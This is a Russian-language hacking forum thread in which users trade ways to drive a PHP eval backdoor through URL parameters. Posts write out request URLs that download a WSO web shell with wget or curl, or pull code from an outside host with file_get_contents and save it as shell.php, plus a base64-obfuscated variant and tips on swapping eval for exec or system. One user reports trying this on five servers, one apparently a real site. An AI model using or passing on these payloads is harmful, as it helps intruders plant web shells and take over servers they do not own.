![]() |
тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:
PHP код:
типа site.ru/index.php?f=eval.......???? подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен! |
.php?param1=eval¶m2=wget http://site.com/wso.txt -O shell.php
как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl |
Код можно очень сильно сократить
|
команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это
Код HTML:
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка? |
Цитата:
Код:
http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h); |
Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое
|
wget это системная функция, eval-то при чем?
|
Цитата:
|
|
еще один хакер... давайте глупости писать не будем может?
|
Цитата:
|
PHP код:
|
Цитата:
|
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот
Код:
сейчас запрос таков: Код:
http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h); |
Цитата:
Код:
http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwidyIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQpO2ZjbG9zZSgkaCk7');Еще вот посмотри http://habrahabr.ru/post/215139 http://habrahabr.ru/post/215817/ |
Цитата:
Код:
интересует конкретно вопрос: можно ли обфусцировать всю строку без потери работоспособности и меняется ли при этом кодировка в запросе? |
Б3, запости им свой зиродей
|
разобрался ребята, за назойливость прошу простить
для меня лучший варик это: Код:
и еще, eval часто не срабатывает - заменяем на exec или system и радуемся. Выше хороший человек подсказал: спасибо ему второй раз! |
eval работает всегда а вот как раз таки system часто отключен, уверен на 100% передаешь в eval невалидный код вот и облом
|
|
Вставляю этот скрипт для аплоада при использовании eval($_GET[cmd]);
Код:
Done ==> $userfile_name"; |
Код:
|
| Время: 21:10 |